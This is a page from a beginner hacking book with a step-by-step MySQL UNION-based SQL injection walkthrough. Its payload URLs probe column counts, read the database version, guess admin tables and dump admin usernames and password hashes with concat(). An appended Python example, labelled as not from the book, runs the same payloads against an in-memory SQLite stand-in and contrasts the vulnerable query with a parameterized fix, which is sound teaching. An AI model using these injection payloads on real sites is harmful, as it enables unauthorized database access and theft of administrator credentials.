Hacking For Beginners – Manthan Desai
2010
With UNION we can select more data in one SQL statement.
So we have http://www.site.com/news.php?id=5 union all select 1,2,3/*
(We already found that the number of columns is 3 in section 2.) If we see some numbers on the screen, i.e. 1 or 2 or 3, then the UNION works.
Step 4:- Check for MySQL version
http://www.site.com/news.php?id=5 union all select 1,2,3/*
NOTE: if /* is not working or you get some error, then try -- instead. It's a comment, and it's important for our query to work properly.
Let's say that we have number 2 on the screen. Now, to check for the version, we replace that number with @@version or version() and get something like 4.1.33-log or 5.0.45 or similar.
It should look like this: http://www.site.com/news.php?id=5 union all select 1,@@version,3/*
If you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."
I didn't see any paper covering this problem, so I must write it.
What we need is the convert() function, i.e. http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*
Or with hex() and unhex(), i.e. http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*
And you will get the MySQL version.
Step 5:- Getting table and column name
Well, if the MySQL version is < 5 (i.e. 4.1.33, 4.1.12...) <--- later I will describe MySQL > 5 versions. We must guess table and column names in most cases. Common table names are: user/s, admin/s, and member/s ... Common column names are: username, user, usr, username, password, pass, passwd, pwd etc...
I.e. it would be http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (We see number 2 on the screen like before, and that's good.) We know that the table admin exists...
Now to check column names: http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (If you get an error, then try the other column names.)
We get the username displayed on the screen; examples would be admin, or superadmin etc...
Now to check if the column password exists: http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (If you get an error, then try the other column names.)
We see the password on the screen as a hash or in plain text; it depends on how the database is set up, i.e. md5 hash, mysql hash, sha1...
Now we must complete the query to look nice :) For that we can use the concat() function (it joins strings), i.e. http://www.site.com/news.php?id=5 union all select 1,concat(username, 0x3a, password),3 from admin/*
Note that I put 0x3a; it's the hex value for : (so 0x3a is the hex value for a colon). (There is another way for that: char(58), the ASCII value for :.)
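Added example, not from the book: the query-building pattern behind a page like news.php?id=... that makes the UNION trick above work, beside a hardened version that validates and binds the parameter. An in-memory SQLite database stands in for MySQL (assumed table and column names, rows, and the use of SQLite's || in place of MySQL's concat()); the payload uses the -- terminator the text mentions.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the site's MySQL database (assumption:
    a three-column news table, which is why the text's payload selects 1,2,3)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news(id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO news VALUES (5, 'Hello', 'First post');
        CREATE TABLE admin(username TEXT, password TEXT);
        INSERT INTO admin VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return conn


def news_vulnerable(conn, id_param):
    """The pattern behind news.php?id=...: the raw parameter is pasted into the
    SQL text, so a UNION inside the parameter becomes part of the statement."""
    sql = "SELECT id, title, body FROM news WHERE id=" + id_param
    return conn.execute(sql).fetchall()


def news_hardened(conn, id_param):
    """Same query, fixed: check the type first, then bind the value as a
    parameter so it is only ever compared against id, never parsed as SQL."""
    try:
        news_id = int(id_param)
    except ValueError:
        raise ValueError("id must be an integer") from None
    sql = "SELECT id, title, body FROM news WHERE id=?"
    return conn.execute(sql, (news_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # The text's column-count probe, with the -- terminator it mentions (SQLite's
    # tokenizer rejects an unterminated /* at the very end of a statement).
    probe = "5 union all select 1,2,3-- "
    print(news_vulnerable(db, probe))   # extra row (1, 2, 3): the UNION works
    # SQLite spells MySQL's concat(username,0x3a,password) as username||':'||password
    dump = "5 union all select 1,username||':'||password,3 from admin-- "
    print(news_vulnerable(db, dump))    # the admin row rides along
    try:
        news_hardened(db, probe)
    except ValueError as e:
        print("hardened:", e)           # the same input is rejected outright
```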
www.hackingtech.co.tv
Page 148